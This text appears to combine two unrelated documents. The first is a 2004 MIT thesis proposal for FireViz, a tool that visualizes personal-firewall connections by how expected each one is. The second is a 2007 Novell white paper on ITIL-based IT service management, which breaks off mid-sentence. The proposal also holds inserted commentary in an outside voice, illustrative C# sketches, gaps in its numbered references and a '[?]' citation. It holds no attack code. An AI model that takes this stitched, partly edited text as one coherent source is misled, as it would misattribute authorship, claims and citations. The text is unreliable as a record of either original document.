Massachusetts Institute of Technology Department of Electrical Engineering and Computer Science Master of Engineering Thesis Proposal Title: FireViz: A Personal Network Firewall Visualizing Tool Submitted by: Nidhi Sharma 143 Albany Street, 134A Cambridge, MA 02139 Date of Submission: December 13, 2004 Expected Date of Completion: May, 2005 Laboratory: Computer Science and Artificial Intelligence Laboratory Abstract: This proposal outlines the development of a personal firewall visualizing tool called FireViz. FireViz leverages the human perceptual capabilities by employing various visual analytic techniques to depict network activity in real time. FireViz creates network usage profiles to depict anomalous behavior so that users may update their firewall security policies to provide greater computer security. The primary goal of FireViz is to educate typical computer users of the security threats their computers face, when connected to a network, through the use of effective visual cues. Contents 1 Introduction 3 1.1 The Need for User Education 3 1.2 The Need for Visualization and Usability Engineering 4 1.3 FireViz 4 2 Related Work 5 2.1 Network Traffic Analysis 6 2.2 Network Traffic Visualization 6 3 Design 7 3.1 Design Overview 7 3.2 Usability Engineering 10 4 Implementation 11 4.1 Overview 11 4.2 Evaluation 11 5 Schedule 11 6 Conclusion 12 1 Introduction The Internet is playing an increasingly important role in business, education and communication. While the Internet is a powerful means to establish connections to other remote hosts and effectively share useful data, it also serves as a medium to quickly and widely spread malicious data. Any host connected to a network is liable to be compromised by various means. Given this hostile internet environment, it is imperative that every computer connected to the internet be protected by appropriate means. While organizations have a greater incentive in securing their hosts and networks, ordinary home users are generally unaware of both the risks and the measures for preventing attacks. However, few personal security tools focus on educating users about the threats they are exposed to. This proposal describes a personal network visualization tool called FireViz. FireViz is designed to provide real-time visualization about the network processes on a given host and reveal potential threats and holes in the firewall’s security policies. 1.1 The Need for User Education Almost every computer connected to a network is constantly scanned for various security vulnerabilities. Worms and viruses are self-replicating programs that scan the network for vulnerable hosts and infect them. However, unlike viruses, worms need no user initiation, such as opening a file, and hence spread very quickly and easily. Attacks launched by viruses and worms, among others, quickly compromise the integrity of the affected host and spread to many others. Over the last few years, both the intensity and frequency of such network-based attacks have increased rapidly. By the end of the year 2004 alone, internet users will have been confronted by an estimated 100,000 forms of malicious attacks [1]. Not just the frequency and intensity of these attacks alone but even the shrinking time lag between when the vulnerabilities are announced and are exploited is a cause for major concern. A study of network worms launched over the last 24 months shows the time lag shrinking from 330 days for the Nimda Worm in 2002 [2, 3], to 16 days for the Sasser in April 2004 [4, 5]. 
According to the Gartner research [6], this pattern will only get worse. The study projects a 25% increase over the next several years in 'Zero Day' attacks, which exploit software vulnerabilities that have no known fixes [7]. Given these statistics, network users have to stay current with the existing security mechanisms that are already struggling to keep up with the sophistication of attackers today. As a result, the tolerance for any laxity in maintaining computer security is diminishing quickly. Statistics report that the average survival time for an unprotected computer has fallen from 40 minutes in 2003 to a mere 20 minutes in 2004 [8]. Many commercial developers are promoting tools to monitor and protect individual computers. Personal network firewalls such as Zone Alarm [9], Kerio [10] and Sygate [11] succeed in detecting and blocking numerous unfriendly network probes. However, few personal security applications focus on informing the user of the extent or nature of these threats. This is particularly evident when examining the user interfaces of these firewalls. Zone Alarm, for example, allows users to grant internet access to programs on application granularity. Once applications are deemed as trusted, the user is not given any further feedback on their network activity. This eliminates all feedback for users about potential attacks launched through these trusted applications. Zone Alarm does, however, provide users with information on port scanning activities. However, this information is provided to the users in very intrusive ways. As a result, many users turn off feedback from port scans, further reducing the information they may receive. Security is a complicated and an important aspect of using computers today. It is therefore essential for all users to understand the possible vulnerabilities their computers are exposed to. Given current trends, awareness is irreplaceable for survival. To this end, many network security applications have singularly failed to educate the very users they hope to protect. This lack of awareness also provides negative feedback by reducing users’ motivation to run personal security software at all times. It is no surprise then that a majority of internet users today fail to appreciate the reality of the security threats they are exposed to. In a study conducted by the NCSA, more than a third of the users surveyed said that they had a greater chance of winning the lottery than being hit by malicious code [12]. This is not just characteristic of novice users. Many sophisticated computer users are also unaware of the sheer volume of such threats. At the SC03 conference in 2003, many expert computer users were surprised at the number of malicious attempts at the conference’s high bandwidth network [13]. All these statistics suggest that there is immediate need for computer users to be educated of potential threats to their computers. 1.2 The Need for Visualization and Usability Engineering While many personal security applications do not provide any feedback or visual cues about network activity, they do maintain activity logs to a certain extent. These logs can, in principle, be used to find unexpected or anomalous network behavior that may be potentially harmful. The analysis of these logs can either be automated or conducted manually by an expert user. Automatic analysis is based on statistical modeling and machine learning. 
However, such data mining techniques minimally engage human interaction and visualization and are likely to miss important features in the data. Manual inspection, on the other hand, is extremely tedious, and neither approach can reasonably be expected of typical network users. Most importantly, these logs lack the situational context of what the user was doing at the time of the network activity. Such situational context is often more important than the nominal connection information for detecting anomalous or unexpected activity.

The human perceptual processor is capable of very fast visual processing; information depicted visually is therefore easier to process, and interesting patterns and features are easier to make out [14]. Consequently, tools that use visualization can leverage this human capability to enable users to easily discern anomalous network events. FireViz is a personal network firewall analyzer that uses information visualization to take advantage of the huge bandwidth of the human visual system. It provides quick, real-time network information for users and uses visual cues to aid in detecting anomalous activities. The use of visual cues is especially helpful when users do not know exactly what information to look for, which is typical of network activity monitoring. FireViz works in conjunction with the user's personal firewall and provides a more intuitive window onto the network on which the firewall acts.

### 1.3 FireViz

FireViz is an attempt at solving both these problems - educating users about network threats and doing so effectively. FireViz provides a peripheral window that runs alongside a personal network firewall and on which all activity is displayed. It detects all network activity in real time and visually displays the information, highlighting the most crucial pieces, such as the host application, the remote location and the 'expectedness' of that connection (the notion of expectedness is explained in detail in the design overview section of this proposal), while allowing the user to analyze any subset of the events more closely. This way, FireViz creates a model of the network weather and behavior for the user.

FireViz is based on a simple philosophy - you cannot protect when you can't see. FireViz is used in conjunction with tools that enforce security policies, such as personal firewalls. However, no security system is perfect, and hence there is a constant need to update not just the policy-enforcing tools but also the policies themselves. Users cannot be expected to update their security policies unless they know what the security policies should be. Furthermore, users cannot know what the security policies should be unless they have an understanding of which aspects of network behavior are expected and which ones are potential threats. Additionally, most users, when using the network, do not have security as a primary goal. This insight forms the basis of FireViz's emphasis on visualizing network security at a low cost to the user.

FireViz is designed to be useful to even novice computer users. It aims to achieve the following main goals:

- **Educate users about their network conditions.** The primary goal of FireViz is to educate users to keep up their defense mechanisms at all times by providing them with a more concrete network security model.
- **Provide users with immediate feedback on all network activity.** This is to allow users to gain a deeper understanding of the network to which their computer is connected and to develop a model of expected behavior. Such a model is complemented by the situational context around each network activity. Such knowledge is helpful in detecting potentially malicious behavior.
- **Employ effective visual techniques to display important information.** This will allow even novice users to easily discern exceptional events and examine them more closely. This goal translates into the following subgoals:
  - Since network activity is very frequent, all information must be provided in as non-intrusive a fashion as possible.
  - The cost to the user of retrieving this information should be minimal. This means that costly operations, such as a complete switch of the user's attention and current application, should be avoided.
  - Since displaying all relevant information related to a specific connection is infeasible (displaying more information also requires more space), the most easily available information should highlight only the most interesting features of the connection. All other information should be easily accessible if the user chooses to retrieve it.
  - The visualization should be selectively biased towards exceptional events or anomalies instead of routine, safe actions.
  - The visualization should effectively summarize the network weather for a certain time window. This will allow a user to get an overview of the network conditions even if she has been away from the computer.

My thesis researches a novel way to visualize network activity. I believe that more effective visualization techniques will help achieve increased network awareness for users at a low learning cost, as well as improved system security.

## 2 Related Work

FireViz's design objectives intersect two important research areas - network traffic analysis and network traffic visualization - both of which have a substantial body of current research.

### 2.1 Network Traffic Analysis

Many users secure their computers using software mechanisms such as anti-virus tools and personal network firewalls. Commercial firewalls such as ZoneAlarm [9], Kerio [10], Sygate [11] and Norton [15] make sure that the doors providing entry to the computer are not left wide open. Such doors may include vulnerable or buggy applications running on the computer that listen for network data. Firewalls isolate the host computers by intercepting each packet of data, incoming or outgoing, and selectively allowing some packets to continue, based on the security policies. The challenge for firewalls is to maintain accessibility while maintaining security.

FireViz relies on both the system firewall and its own network scanning module to monitor network activity on the host on which it is running. Tools such as Netstat [16] and TCPView [17] provide the state of network activity on the host at any given point. FireViz uses such data to profile expected network behavior and to expose any anomalies as potential holes in the firewall's security policy. However, such tools cannot be used to display activity that has already been blocked by the firewall. FireViz maps the expectedness of allowed network accesses over time by monitoring observable features of network traffic, such as the frequency of such accesses and the level of trust the firewall has for the access. By creating this model of expectedness, FireViz attempts to create a profile of what constitutes typical network activity.
This profile is then compared to each new activity and the user can easily discern any deviation from the regular profile. This idea is similar to Anomaly detection systems (ADS) and Intrusion Detection Systems (IDS) such as Symantec Advantage [18] and Cisco Trellis [19]. Anderson et al. [20] describe such ADS systems in greater detail. However, FireViz uses network firewall data. Firewalls often merely implement security rules and do little intrusion detection. Thus, unlike visualization tools that are based on IDS data [13], FireViz’s profiles are constructed from data with no false positives. The various ADSs and tools such as NetFlows [21] record information on unidirectional end-to-end transactions, aggregating packets into larger flows of data. However these tools best operate on whole network systems rather than focusing on individual hosts on the network. Erbacher [22] describes visualizations of collections of individual transactions on a single machine. A similar tool, NVisionIP [23] spans multiple levels of network abstractions including the entire network, a subnet or a single machine. As evident from this sampling, various tools exist to monitor network traffic on various levels of abstraction. 2.2 Network Traffic Visualization The use of information visualization to display network traffic is an idea that is being widely experimented with. Information visualization mechanisms such as parallel coordinates and self-organizing maps [24, 25], have been specifically designed for this purpose. PortVis [26], which uses port-based detection of security activities, uses a visualization system that depicts the network traffic by choosing axes for important features of the connection data and creating cells in a grid which represent the network activity at that point. SeeNet [27] uses a colored grid, where each point represents the amount of traffic between the hosts represented by the x and y coordinates of the point. NVisionIP [28] uses a graphical matrix representation to show relationships between events on a network. VisFlowConnect [29] uses a parallel axes representation to display network traffic both within and between domains. However, all of these tools are designed to facilitate anomaly detection in whole network systems intended to be used by expert system administrators. FireViz on the other hand, is intended to be used by any users, regardless of their proficiency level and without any special training. The Spinning Cube of Potential Doom [?] provides an animated display of network traffic within a 3D cube that users can spin at will. The cube is intended to be used by novice users as well. However, unlike the cube and other network visualization tools, FireViz is a real-time display - it provides a display of the activity as it happens, without the user having to explicitly request the information or switch context to the visualization tool. Additionally, many of these tools provide network level information and finding host-specific information is relatively harder. Network Eye [30] attempts to provide a more balanced Host/Network picture by preserving the context when displaying the whole network at once and showing the interactions within the hosts and their programs. It is nevertheless still meant to be used by network administrators to detect potential threats. One of the goals of FireViz is to provide the user with the situational context along with network traffic. 
This goal has inspired us to provide animated logging features that essentially allow the user to replay the moment of the said activity. VisFlowConnect [29] employs animation to replay events recorded in the data logs as they occurred. Teoh et al. [31] describe a focus + context radial layout to manage screen real estate by showing snapshots of activity in adjacent time periods in a circle around a larger focal image. Such a layout could be used to display a specific feature of network activity during consecutive time periods.

## 3 Design

This section describes the design of FireViz.

### 3.1 Design Overview

FireViz aims to achieve the above goals by employing a careful design. FireViz uses a number of visual variables [32] and redundant cues to meet the design requirements. To make the interface non-intrusive, most information is displayed by transient elements such as labels and lines, instead of modal dialog boxes mandating user input. Furthermore, these elements are drawn on the user's desktop instead of a separate FireViz application window. Each activity element is accompanied by a small label that shows the application that caused/received the activity, the remote host and a subjective frequency measure (such as "First Access", "Rare", "Occasional" or "Frequent") [33]. This label appears for a few seconds, around the periphery of the screen, so to receive this information the user need only glance at the spot where the label appears. The transient elements are then replaced by a small lump at the same location. The lumps remain at that location for a few hours and can be clicked at any time to retrieve more detailed information. Additional cues, such as the shape and color of the activity, give information about whether the connection involved the current process or a background process and whether the connection was successful.

Figure 1 presents a snapshot of FireViz detecting network activity from Internet Explorer. As soon as the connection was detected, FireViz displayed a line from the application window to a label along the periphery of the screen. The label itself contains the hostname of the remote host and a subjective connection frequency measure ('Rare' in this case). This display stays on the user's screen for all of five minutes and is then replaced by the green lump alone. The green color signifies that the connection was allowed by the firewall. The green lump serves as a vestige of the said connection and can be clicked on to receive further information, as shown in Figure 2. The transient display in Figure 1 very compactly encapsulates the remote host, the connection frequency, the firewall action (Allowed or Blocked) and the application that made the connection. Thus FireViz takes advantage of the situational context to compactly highlight the most interesting features of the connection. In case the application window is hidden or non-existent, FireViz instead displays a transient, flashing green circle along with the application icon.

Another important aspect of the visualization in FireViz is the network mapping around the periphery of the user's screen. FireViz creates an image of the network traffic involving the host by mapping the level of expectedness along the screen periphery. The expectedness is measured in terms of the frequency of the connection and the trust policy of the firewall (whether or not the connection is deemed "trusted" by the firewall).
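The proposal does not spell out the exact thresholds behind the subjective frequency measures, so the following C# sketch should be read only as one plausible mapping from raw access counts to those labels and to the color cue; the thresholds, type names and the choice of red for blocked connections are illustrative assumptions rather than details of the actual FireViz implementation.

```csharp
// Illustrative sketch only: thresholds, type names and the red color for
// blocked connections are assumptions, not the actual FireViz implementation.
using System;

enum FirewallAction { Allowed, Blocked }

class ConnectionEvent
{
    public string Application;      // e.g. "iexplore.exe"
    public string RemoteHost;       // e.g. "web.mit.edu"
    public int PriorAccessCount;    // how often this (application, host) pair has connected before
    public FirewallAction Action;   // what the firewall decided
}

static class ActivityLabel
{
    // Map a raw access count onto the subjective measures shown in the labels.
    public static string FrequencyLabel(int priorAccessCount)
    {
        if (priorAccessCount == 0) return "First Access";
        if (priorAccessCount < 5) return "Rare";
        if (priorAccessCount < 50) return "Occasional";
        return "Frequent";
    }

    // Green signifies a connection the firewall allowed; red is assumed here for blocked ones.
    public static ConsoleColor CueColor(FirewallAction action) =>
        action == FirewallAction.Allowed ? ConsoleColor.Green : ConsoleColor.Red;

    // Text for the transient label drawn along the screen periphery.
    public static string LabelText(ConnectionEvent e) =>
        $"{e.Application} -> {e.RemoteHost} ({FrequencyLabel(e.PriorAccessCount)}, {e.Action})";
}
```

In the tool itself, the label text and color would of course be rendered as transient desktop elements along the screen periphery rather than as console output.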
Each attempted (successful or unsuccessful, incoming or outgoing) connection to the machine is depicted, as described above, at the point that correlates with the expectation of that connection. As a certain network action is repeated multiple times, its expectation increases with the frequency. However, the most expected connections are those that are frequently made by trusted applications; mere frequency does not make connections completely expected.

An expectation-based profile, such as the one described above, in combination with some situational context can help users identify extraordinary events. For example, if a user checks her email, the connection to the mail server will likely be expected (not only is the email client a trusted application, but email is also checked frequently). However, if one of the email messages has a web bug embedded in it that makes a connection to some unidentified server, this connection will be unexpected (the frequency of connections to the unidentified server from the user's computer will likely be low, even though the mail client is a trusted application) and can successfully draw the user's attention. On closer analysis of this connection, the user may realize that the connection was indeed unexpected and unsafe, and consequently change the security policy in her firewall to disallow connections to the said remote host.

The location of the label along the periphery of the screen is dictated by the expectation of the connection. The expectation is a quantitative value that is a function of the frequency of the connection and the trust associated with it by the firewall. The expectation increases from the lower-right corner of the screen to the top-left corner of the screen in a continuous fashion. This mapping is translated into four nominal expectation values which are displayed in the labels. Thus, if an unexpected network event occurred while the user was working on trusted applications, she could easily make out the unexpected event. As FireViz collects more data about the system's network patterns, expected (i.e., trusted and frequent) activity slowly starts to fade away until it is no longer visible. This allows the user to focus her attention only on more interesting events, such as an untrusted application (e.g., spyware) making lots of connections.

Finally, FireViz will employ an animated logging scheme to provide situational context in its logs. It will store not just the connection state for each network activity but also a screenshot of the computer at the time of the said activity. Thus, a user viewing the log can easily perceive (in the above example) that the mail client made a connection to the unknown server while checking a certain email message. No information is lost in the logs, and hence the user can still make the appropriate security policy changes.

An important consideration in the design of FireViz is to make the interface non-intrusive and helpful at the same time. Given that users do not have security as their primary goal and are unsure of what to look for, the interface has to be extremely easy to learn and use. Thus FireViz uses a simple expectation-based mapping that is easy to learn and provides an easy means to retrieve the information that the user chooses. The following section describes the usability engineering process of FireViz in greater detail.
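The proposal likewise does not fix a formula for the expectation value, so the sketch below is only one plausible instantiation, assuming an equal weighting of a capped, logarithmic frequency term and a binary firewall-trust term; it interpolates the resulting score along the lower-right-to-upper-left diagonal as a stand-in for the full periphery mapping and fades highly expected activity.

```csharp
// Minimal sketch under assumed weights; the proposal does not prescribe an exact formula.
using System;

static class Expectation
{
    // Combine connection frequency and firewall trust into a score in [0, 1].
    // The frequency term is capped so that untrusted but frequent connections
    // never become fully "expected" on frequency alone.
    public static double Score(int accessCount, bool trustedByFirewall)
    {
        double frequencyTerm = Math.Min(1.0, Math.Log(accessCount + 1) / Math.Log(1000));
        double trustTerm = trustedByFirewall ? 1.0 : 0.0;
        return 0.5 * frequencyTerm + 0.5 * trustTerm;
    }

    // Screen coordinates with the origin at the top left: a score of 0 maps to the
    // lower-right corner (unexpected), a score of 1 to the upper-left corner (expected).
    public static (int X, int Y) LabelPosition(double score, int screenWidth, int screenHeight)
    {
        int x = (int)((1.0 - score) * (screenWidth - 1));
        int y = (int)((1.0 - score) * (screenHeight - 1));
        return (x, y);
    }

    // Highly expected activity fades as more evidence accumulates.
    public static double Opacity(double score) => 1.0 - score;
}
```

Capping the frequency term reflects the point made above: frequency alone, without firewall trust, never makes a connection completely expected.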
### 3.2 Usability Engineering

The development process of the user interface for FireViz follows the spiral model [34] of iterative design [35]. As a first step, I conducted a user analysis and task analysis [36] to establish the user characteristics and identify the most commonly performed tasks. This stage involved informal interviews with various people in the target user population to assess their familiarity with personal firewalls and understand their security priorities. I identified two broad categories of users - novice computer users and expert computer users. FireViz is designed specifically with the capabilities and concerns of novice users in mind. This decision influenced many design features of FireViz. For instance, it led us to incorporate minimal or no initial setup and configuration, to carefully speak the users' language where appropriate and to provide an easily learnable profiling algorithm.

After conducting the user analysis, I established some crucial tasks that users would perform through FireViz. Once the tasks were identified, I started brainstorming about the user interface, keeping in mind the design requirements outlined above. The implementation process started with developing low-fidelity prototypes, such as design sketches and paper prototypes, and performing user tests. The next step involved the development of a horizontal computer prototype that incorporated the feedback from the user tests of the previous prototypes. The computer prototype was then heuristically evaluated by four users. Heuristic evaluation [37] revealed several issues with the computer prototype that were then rectified in the successive computer prototype. The next step is to user test the latest computer prototype while continuing to add more functionality on the backend. Finally, a fully operational version of FireViz will be distributed to users to run and test for extended periods of time to assess each aspect of FireViz's user interface. Users will be asked to evaluate this version of FireViz on various dimensions of usability, such as learnability, memorability and subjective satisfaction, through both quantitative measures (such as time taken to perform a task) and qualitative feedback.

## 4 Implementation

### 4.1 Overview

FireViz is implemented using C# and .NET technology. It is designed to work on the Windows XP operating system with a personal firewall. The choice of firewall will depend on the availability of an exported API to extract the requisite information or, at the minimum, the source code for the firewall. Certain open source firewalls for Windows, such as NetDefender, Fiseclab and Agnitum Outpost, are available on the Internet. The implementation of FireViz is structured around various independent modules that interact with each other. The following is a high-level listing of FireViz's modules:

- **Network Monitoring Module** This module is responsible for detecting network activities. This is done in two parts: an independent thread scans for newly established connections, and another scans the firewall logs for any blocked accesses. The network module detects new activities and notifies the View module and the Logging module for further processing.
- **Logging Module** This module maintains long-term state on all network connections detected by the network module. The Logging module uses this information to calculate the expectedness of the connection.
- **Display Attributes Module** This module uses data from the Logging module and the firewall to calculate the display attributes for the View module. Display attributes such as the location and intensity of visible controls are calculated. Factors such as high frequency and firewall trust are considered here to produce attributes that highlight extraordinary behavior. For instance, a new, unexpected connection would be more prominent than a more expected connection.
- **View Module** The View module receives information from the network module and the attribute module to show the appropriate transient activity on the user's screen. It also provides the means for user input and is responsible for placing an application icon for FireViz in the system tray.

### 4.2 Evaluation

The backend for FireViz will be tested to ensure that it works accurately. The detection module will be tested to make sure that detected connections match the results from other similar tools, such as TCPView [17], and that all firewall-logged events are detected as well. The logging and attribute modules can be tested by checking that connection state is persisted and restored correctly across multiple sessions of running FireViz. Finally, the user interface will also be evaluated through user tests and heuristic evaluations, as outlined in the usability section of this paper.

## 5 Schedule

The following proposed schedule outlines the major milestones in the development of FireViz, including design and evaluation iterations and technology transfer.

- **September 2004** - Brainstorming ideas and collecting related research; user analysis
- **October 2004** - Low-fidelity paper prototype testing
- **November-December 2004** - Development and testing of hi-fidelity prototypes
- **January-February 2005** - Second iteration of fully functional FireViz version
- **March 2005** - Extensive user testing
- **April-May 2005** - Documentation, technology transfer and publication of research results

## 6 Conclusion

Even with the presence of personal security mechanisms such as personal firewalls, many malicious activities go unnoticed and unabated. Using existing knowledge about every network connection, combined with a network behavior profile and proper use of visual cues, it becomes easy for even unsophisticated users to detect potentially malicious network activity. This proposal describes the design of a network firewall visualizing tool that can be used by typical network users to gain a deeper understanding of security vulnerabilities and leverage their protection mechanisms to achieve a much higher level of security.

## References

[1] Study: Consumers take cyberattacks lightly
[2] Nimda worm strikes Net, email
[3] http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
[4] http://www.microsoft.com/security/incident/sasser.mspx
[5] http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html
[6] http://www3.gartner.com/research/focus_areas/asset_48267.jsp#Research
[7] InfoSec 2003: 'Zero-day' attacks seen as growing threat, http://www.computerworld.com/securitytopics/security/story/0,10801,88109,00.html?SKC=news88109
[8] Study: Unpatched PCs compromised in 20 minutes
[9] ZoneAlarm Security Suite, http://www.zonelabs.com
[10] Kerio Personal Firewall, http://www.kerio.com/us/kpf_home.html
[12] AOL/NCSA Online Safety Study
[15] Norton Personal Firewall, http://www.symantec.com/sabu/nis/npf/
[16] Microsoft Windows XP - Netstat
[17] Sysinternals TCPView, http://www.sysinternals.com/ntw2k/source/tcpview.shtml
[19] Cisco Trellis IDS
[23] W. Yurcik, J. Barlow, K. Lakkaraju, and J. Rosendale. A prototype tool for visual data mining of network traffic for intrusion detection. 3rd *IEEE International Conference on Data Mining (ICDM), Workshop on Data Mining for Computer Security (DMSEC)*, 2003.
A Blueprint for Better Management from the Desktop to the Data Center

March 2007

Table of Contents

- Executive Summary
- IT Infrastructure Library (ITIL)
- Blueprint for Desktop to Data Center Management
- A New Model of Computing
- Appendix—Open Standards and Open Source

**Executive Summary**

There has been no greater change in IT management thinking in the last 30 years than the burgeoning focus on Service-Oriented Architecture and Infrastructure. Simply put, instead of focusing solely on what IT work is done, organizations are now calling on CIOs to focus on how well IT delivers its full spectrum of services to support the bottom line. If an employee needs access to a service, they don't care where the persistent data is stored, how the client-side, middleware or server software is instantiated, which servers it's running on or what operating systems are required. They never did care. They only want the service, preferably every time they require access, with no unexpected interruptions or processing delays. We live in an on-demand world, and technobabble excuses and limitations from the IT department are no longer tolerated by today's businesses.

Service-Oriented Infrastructure creates new challenges for CIOs, who already are governed by legislation to ensure and attest to authorized access, control wasteful power consumption and balance over-provisioning with redundancy for disaster tolerance. Now, IT organizations are consolidating their operating systems, servers and storage, and are implementing technologies like virtualization to overcome the static limitations of service deployment and continuity management that exist in the physical world.

Delivering services to users requires successful implementation of all the management disciplines, but you must go further—these disciplines must interact seamlessly on behalf of the service delivery. For example, for the CIO to access SAP resources on the network, the system must understand authorizations, roles and other security issues; check on the configuration and patch levels of the access device; enact Change Management and potentially Release Management processes; track issues or problems with service continuity management; and potentially provision new service-oriented components, requiring licensing and approvals. At any stage in this process, dropping into a manual procedure will violate the service-level objective. All of these silos must work together to achieve CIOs' dreams of an automated service delivery infrastructure.

Adding fuel to the fire are security risks, regulations (Sarbanes-Oxley [SOX] and the Health Insurance Portability and Accountability Act [HIPAA]), the need to implement IT best practices (the IT Infrastructure Library [ITIL] and Control Objectives for Information and Related Technology [COBIT]) and requirements set forth in new standards (International Organization for Standardization [ISO] 20000, the first international standard for IT service management).

“...
IT needs to find clearer, more relevant metrics for showing business alignment and relevance, service quality supportive of that alignment, and cost efficiency in delivering its service products to the business. Moreover, IT is also being asked to support compliance and security initiatives that are adding extra relevance and context to this drive towards accountability. — Enterprise Management Associates, “Getting Started with ITIL’s CMDB...,” Sept. 2006 Most forward-thinking CIOs are basing their process-management improvements around ITIL. Any successful product architecture will need to be built from the ground up with ITIL services as its central core. With the publication of ITIL 3 (ISO 20000) in 2007, a large increase in the adoption of ITIL is expected in the U.S., which currently lags the rest of the world in ITIL adoption. No single management software vendor will be able to provide all the pieces required to deliver on CIOs’ dreams for a Service-Oriented Infrastructure. Fortunately, standards for product interaction have matured to the point where one can depend on them to provide seamless integration of third-party and partner products as well as extensions customers make themselves. IT Service Management (ITSM) removes traditional IT silos, informal processes and firefighting, and this blueprint for management also identifies viable industry standards and points of integration with existing products and systems. In this paper, we wish to continue our interaction with two diverse audiences. First, we plan to increase our support of the open source development community by creating an open systems management architecture that encourages innovation with respect to the higher-order problems of distributed systems management. We invite you to think big about code that manages storage for thousands of virtual machines (VMs)—one of many exciting challenges ahead. We think it’ll be fun. Second, this paper is written for those whose job it is to manage information technology. You are faced with the difficult task of figuring out what tools are available—commercially or via open source—and whether, when and how to use them, while keeping track of licensing and integration and providing determinism with respect to your business. And you are expected to adhere to the concepts of ITIL that provide increased service levels for lower cost. Our strategy is to build an open management architecture that offers distinct value through sophisticated integration of otherwise isolated components: “One of the overall design goals is to create a computing system which is capable of meeting all of the requirements of a large computer utility. Such systems must run continuously and reliably 7 days a week, 24 hours a day... and must be capable of meeting wide service demands.... Because the system must ultimately be comprehensive and able to adapt to unknown future requirements, its framework must be general, and capable of evolving over time.” – Corbató and Vyssotsky on Multics, http://www.multicians.org/fjcc1.html, 1965 **IT Infrastructure Library (ITIL)** ITIL provides best-practice guidelines and architectures on all aspects of end-to-end service management to ensure that IT processes are closely aligned with business processes and that IT delivers the correct and appropriate business solutions. 
ITIL is neither a technology standard nor a set of regulations, and therefore there are no entities—including tools and people—that can be deemed "ITIL compliant." Processes and organizations, however, can be assessed against the British Standards Institution's BS 15000, the ISO 20000 standard or COBIT. COBIT and ITIL are not mutually exclusive and can be combined to provide both powerful control and governance of IT service management and a best-practice framework. Enterprises that want to put their ITIL program into the context of a wider control and governance framework should use COBIT.

Figure 1: A comprehensive management blueprint helps align IT processes with user needs and business goals.

ITIL is a comprehensive set of best practices that focus on determining IT service delivery and business efficiency. ITIL outlines methods for IT planning, models and processes, and it establishes the required roles and relationships to execute those processes. The ITIL framework also establishes the working relationship among an organization's service providers, which could include the service desk, application developers, roll-out teams, network managers, building technicians and outside contractors. It calls for unified processes for all service providers in an organization, helping them work together and coordinate projects more easily.

Today's IT manager is less interested in technology as a single means to solve problems and save money. IT technology and products alone don't yield the desired end result and return on investment. Both people and processes must be aligned for maximum benefit. Good processes comprise both technology and people to define work flow, operations, decision making and approvals. Think of it in terms of rolling out a new desktop operating system. Tools may automate the physical delivery of the operating system and software, but if the local building technicians learn about the rollout post facto, the results will be disastrous. Several organizations must work together to ensure minimal disruption to service and to maintain high user satisfaction.

ITIL establishes a common language and terminology across both internal and external IT groups. For example, a Change Advisory Board (CAB) comprises representatives from various IT and service organizations and is responsible for analyzing and approving changes to the standardized environment. Decisions made by the CAB, along with reported incidents and their resolutions, are captured in the Configuration Management Database (CMDB). This database of knowledge is made available to all of an organization's service providers for better communication and cooperation.

The ITIL framework provides an effective foundation for quality IT service management. It is, however, only a framework. The methodologies have been defined, but as you implement them you need to refine them to fit your organization and goals. If one of the processes is bad, it will affect service quality until you resolve the issue. Defining and documenting your processes is an ongoing effort. It takes time, but you can consider it time well spent if you're serious about implementing ITIL. In addition to helping provide swift service to your users, you need such best practices in place to help you capture and assess your corporate asset data for both financial and regulatory compliance needs—no matter how large or small your organization.

**ITIL Components**

ITIL's two major components are Service Delivery and Service Support.
Service Delivery and Service Support cover more of the day-to-day operational processes of IT management. Some of the most common ITIL components are:

- Configuration Management
- Release Management
- Change Management
- Incident Management
- Problem Management
- Availability Management

**Configuration Management**

Configuration Management provides the foundation for successful IT service management and underpins every other process. The fundamental deliverable is the CMDB, comprising one or more integrated databases detailing all of the organization's IT infrastructure components and other important associated assets. It is these assets, known as Configuration Items (CIs), that deliver IT services. What sets a CMDB apart from an ordinary asset register are the relationships, or links, that define how each CI is interconnected and interdependent with its neighbors. These relationships allow activities such as impact analyses and "what if?" scenarios to be carried out efficiently. Ideally, the CMDB also contains details of any incidents, problems, known errors and changes associated with each CI.

**Release Management**

The Release Management process takes a holistic view of changes to IT services, considering all aspects of a release, both technical and non-technical. Release Management is responsible for all legal and contractual obligations for all hardware and software the organization uses. In order to meet this responsibility and protect the IT assets, it establishes secure environments for hardware in the Definitive Hardware Store (DHS) and for software in the Definitive Software Library (DSL).

**Change Management**

A change is initiated to resolve a problem, and a proposal is submitted for approval. A detailed plan is prepared to implement the change, with a rollback plan acting as a safety net. After implementing the change, the requestor needs to verify that the change was successful.

**Incident Management**

Incident Management is responsible for the management of all incidents from detection and recording through to resolution and closure. The objective is the restoration of normal service as soon as possible with minimal disruption to the business.

**Problem Management**

Problem Management assists Incident Management by managing all major incidents and problems while endeavoring to record all workarounds and "quick fixes" as known errors where appropriate, and raising changes to implement permanent structural solutions wherever possible. Problem Management also analyzes and trends incidents and problems to proactively prevent future issues.

**Availability Management**

Availability Management ensures that each service meets or exceeds its availability targets and is proactively improved on an ongoing basis. In order to achieve this, Availability Management monitors, measures, reports on and reviews the availability, reliability, maintainability, serviceability and security of each service and component.

Novell® has engaged in many months' research with hundreds of CIOs and service partners. The result of this research is a blueprint for solutions that can attack the overall problem while still being useful in the individual silos. The blueprint looks at the fundamental elements from the point of view of both the CIO and ITIL.

**Business Process and Technology**

The ITIL framework seeks to bring both business processes and technology together via a series of interrelated management disciplines.
The blueprint acknowledges this effort by echoing the need for business process and technology to work together. To simplify how this can be achieved, we present a set of blueprint blocks that provide a solution in CIO terms, followed by a mapping of the ITIL services used to answer those questions. The blueprint has to cover all the computing resources in a typical organization, including personal, handheld and telecommunications devices as well as desktops, servers, storage and network connections. It must recognize and create virtual environments that emulate any or all of these resources. Finally, it must deal with applications and their virtual instantiations, with full knowledge of usage and licensing implications. Discover The first and foremost problem for CIOs is identifying what they have in their infrastructure at any given point in time. Although many tools are capable of discovering devices, there are often multiple entries for the same device and varying sets of data about the device. Discovery includes accurately identifying and being able to describe resources. This can be as low level as processor type, reboot capability, virtualization capabilities, out-of-band management, hardware components and even server power supply rating. The services available to both users and other services must continually be discovered and put into a real-time service catalog; and just as important are application dependencies, in terms of both configuration and their interaction with active services in the operating environment. The only way for Change Management processes to understand the downstream impacts of possible changes is to discover the dependencies in the environment. The discovery process can be restricted to various classes of IP subnets, and uses both agent and agentless techniques—including Internet Control Message Protocol (ICMP) ping, Simple Network Management Protocol (SNMP) Get and TCP port probing—to discover the 